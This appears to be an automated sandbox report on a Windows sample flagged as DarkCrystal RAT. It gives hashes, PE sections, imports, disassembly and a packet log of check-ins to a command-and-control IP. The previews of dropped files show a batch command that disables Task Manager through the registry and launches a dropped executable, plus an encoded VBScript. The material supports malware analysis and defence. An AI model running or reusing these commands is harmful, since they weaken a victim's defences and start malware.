                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):212
                                                                                                                                  Entropy (8bit):5.4651096190970465
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:Un+3StuH1jhRiI36BVvQON/3S1q5cwhNz:U+TVjhR136V4p1q5dhN
                                                                                                                                  MD5:F0FFA05672141885D2DD1602BDB39A42
                                                                                                                                  SHA1:142E9F1B05D0C787836088B2DB9A6DD758F32024
                                                                                                                                  SHA-256:36B0B64A7B0E11E344D44DD3A0A258505847BADE2F139CFDF50368E324023C44
                                                                                                                                  SHA-512:843733379BE93BCEB521CB83BB3613E7AEA78CF09EAA9A68C735B529394CAE6AD98A0A7BC640E7EC032A1AFDE01F0F819B255E0FBE193B5E33DC064FF7E4339E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:%AKxCAWVDIlWpX%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%BLRJlXEvxuXhlY%..%fvBFUueewlnFXo%"C:\hyperComponentFontDhcp/Mscommon.exe"%aaBJHMIhfgpl%
                                                                                                                                  Process:C:\Users\user\Desktop\kJrNOFEGbQ.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):232
                                                                                                                                  Entropy (8bit):5.8115337044622155
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:GpwqK+NkLzWbH1rFnBaORbM5nCspBSivlcSVs:GcMCzWL1hBaORbQCsfM
                                                                                                                                  MD5:5C2E5FC9D903BB5A7A7CCFDB1150B921
                                                                                                                                  SHA1:8259BA4E4A19692AE97FC0858A9E8D77D9753BF4
                                                                                                                                  SHA-256:7617DC59CD2D53204917ED13FD0A4E03EC02FEB7EB749A3510EEC1E8EB4D6A4F
                                                                                                                                  SHA-512:212EA9CCF9AC4557D9D8344EFBBD09618CC6815571661EA7B7EA2B0F0285613BEEB99133309673D74801EBD26146ADBCD873F9A11A5B4A47ACEBDC4CD4FC10C1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:#@~^zwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z4Hw.DZK:aGx.xOsKxO94mwJ&(7pxWA*DUsN|a a(9%627% bk%+m9E) (lOJB~Z~~6l^/+mUIAAA==^#~@.
                                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):502
                                                                                                                                  Entropy (8bit):4.6048426069826895
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:P7g5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:edUOAokItULVDv
                                                                                                                                  MD5:A87D1C244DB090F6AF11F580B508A899
                                                                                                                                  SHA1:3DF1412C27F9C283BFCD14FC99E0242636E452F0
                                                                                                                                  SHA-256:F1C828F6B16D66B337D8ECF3020B4D66B0F47232EE86442B4B485E547743CDE9
                                                                                                                                  SHA-512:C61DBECCFAD569DCDB870AAC09E65C2C95971BBD28ACFB0D0273F1B1B1FBEE21A91521546DADCCE86E807B59A5595FB5B84171DD680AF96C1C549E2F192BE97E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..Pinging 610930 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.740545664634834
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:kJrNOFEGbQ.exe
                                                                                                                                  File size:4'234'106 bytes
                                                                                                                                  MD5:36bbafbd00e62a37070764eb4ed93308
                                                                                                                                  SHA1:40acb7b8fec8d6d8e0d0a9310c511a35d0b34c27
                                                                                                                                  SHA256:7fbf15fc103c368c639ba11695315909b1dbd9361e83cf48fb2177cc8ff060e2
                                                                                                                                  SHA512:90333b2217773f1d9a667156b84ba785c0ee266b68c832d51a468f9de05550ede939938c659bd87f772edf2781729541bc03979068ced111ea606ed2ed6ab057
                                                                                                                                  SSDEEP:98304:nOj98ly2pM7ENt5adqvzEhtsyAgQWwZWnpIt:w85pMA646wZEpIt
                                                                                                                                  TLSH:4016E106A6A24E73C3512F3CE4E2253D817CDB61B953DFC77A3A1095FC152609AA2DF2
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                                  Icon Hash:f0e9c4f0d0e972c7
                                                                                                                                  Entrypoint:0x41f530
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:1
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:1
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                                  Instruction
                                                                                                                                  call 00007FA16050543Bh
                                                                                                                                  jmp 00007FA160504D4Dh
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  mov esi, ecx
                                                                                                                                  call 00007FA1604F7B97h
                                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                  mov eax, ecx
                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                                  ret
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  mov esi, ecx
                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                                  push eax
                                                                                                                                  call 00007FA1605081DFh
                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                  pop ecx
                                                                                                                                  je 00007FA160504EDCh
                                                                                                                                  push 0000000Ch
                                                                                                                                  push esi
                                                                                                                                  call 00007FA160504499h
                                                                                                                                  pop ecx
                                                                                                                                  pop ecx
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 0Ch
                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                  call 00007FA1604F7B12h
                                                                                                                                  push 0043BEF0h
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  push eax
                                                                                                                                  call 00007FA160507C99h
                                                                                                                                  int3
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 0Ch
                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                  call 00007FA160504E58h
                                                                                                                                  push 0043C0F4h
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  push eax
                                                                                                                                  call 00007FA160507C7Ch
                                                                                                                                  int3
                                                                                                                                  jmp 00007FA160509717h
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  push 00422900h
                                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                                  Programming Language:
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4698c.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xab0000x233c.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x640000x4698c0x46a00a942dea735ae9e5f9f646c2b5189372eFalse0.4457169524336283data5.848102324087047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0xab0000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                  PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                  RT_ICON0x666180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.4308851377341184
                                                                                                                                  RT_DIALOG0xa86400x286dataEnglishUnited States0.5092879256965944
                                                                                                                                  RT_DIALOG0xa88c80x13adataEnglishUnited States0.60828025477707
                                                                                                                                  RT_DIALOG0xa8a040xecdataEnglishUnited States0.6991525423728814
                                                                                                                                  RT_DIALOG0xa8af00x12edataEnglishUnited States0.5927152317880795
                                                                                                                                  RT_DIALOG0xa8c200x338dataEnglishUnited States0.45145631067961167
                                                                                                                                  RT_DIALOG0xa8f580x252dataEnglishUnited States0.5757575757575758
                                                                                                                                  RT_STRING0xa91ac0x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                  RT_STRING0xa93900x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                  RT_STRING0xa955c0x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                  RT_STRING0xa97140x146dataEnglishUnited States0.5153374233128835
                                                                                                                                  RT_STRING0xa985c0x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                  RT_STRING0xa9cc80x166dataEnglishUnited States0.49162011173184356
                                                                                                                                  RT_STRING0xa9e300x152dataEnglishUnited States0.5059171597633136
                                                                                                                                  RT_STRING0xa9f840x10adataEnglishUnited States0.49624060150375937
                                                                                                                                  RT_STRING0xaa0900xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                  RT_STRING0xaa14c0xd6dataEnglishUnited States0.5747663551401869
                                                                                                                                  RT_GROUP_ICON0xaa2240x14data1.1
                                                                                                                                  RT_MANIFEST0xaa2380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2025-01-03T20:47:39.900911+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736193.58.121.13780TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 3, 2025 20:47:39.212910891 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:39.217890024 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.217973948 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:39.219044924 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:39.223808050 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.576263905 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:39.581183910 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.859349966 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.900854111 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.900871992 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:39.900911093 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.121293068 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.122080088 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.122101068 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.168848038 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.173851967 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.324088097 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.329257965 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.329333067 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.329499960 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.334333897 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.363717079 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.363887072 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.368679047 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.558882952 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.559545040 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.564364910 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.694832087 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.699820042 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.873181105 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.903309107 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:40.908281088 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.908298969 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:40.908313036 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.060632944 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.122078896 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.187624931 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.187889099 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.191145897 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.192759037 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.309597015 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.411417961 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.414933920 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.419802904 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.419939041 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.523248911 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.523726940 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.528357983 CET8049737193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.528405905 CET4973780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.528593063 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.528650045 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.532927036 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.537796974 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.739913940 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.888257980 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:41.893183947 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.893198967 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.893220901 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:41.919116020 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.176409006 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:42.310179949 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.318356991 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:42.418963909 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.613490105 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.613490105 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.619028091 CET8049736193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:42.619148016 CET8049738193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:42.619174004 CET4973680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.619250059 CET4973880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.623217106 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.628052950 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:42.628664017 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.629589081 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:42.634351015 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.173430920 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.178423882 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.178443909 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.178457022 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.269217968 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.396414995 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.396501064 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.527714014 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.527890921 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.532762051 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.533004999 CET8049741193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.533108950 CET4974180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.533195972 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.533195972 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.537952900 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.887830019 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:43.892920971 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.892941952 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:43.892956972 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.213927031 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.355870962 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.355930090 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.500725985 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.501290083 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.505891085 CET8049742193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.505944967 CET4974280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.506057024 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.506125927 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.506268024 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.511074066 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.856565952 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:44.861620903 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.861639023 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:44.861649990 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:45.037791014 CET4974580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.042717934 CET8049745193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:45.042789936 CET4974580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.042929888 CET4974580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.046518087 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.047702074 CET8049745193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:45.051625967 CET8049744193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:47:45.051682949 CET4974480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.241437912 CET4974680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:47:45.246351957 CET8049746193.58.121.137192.168.2.4
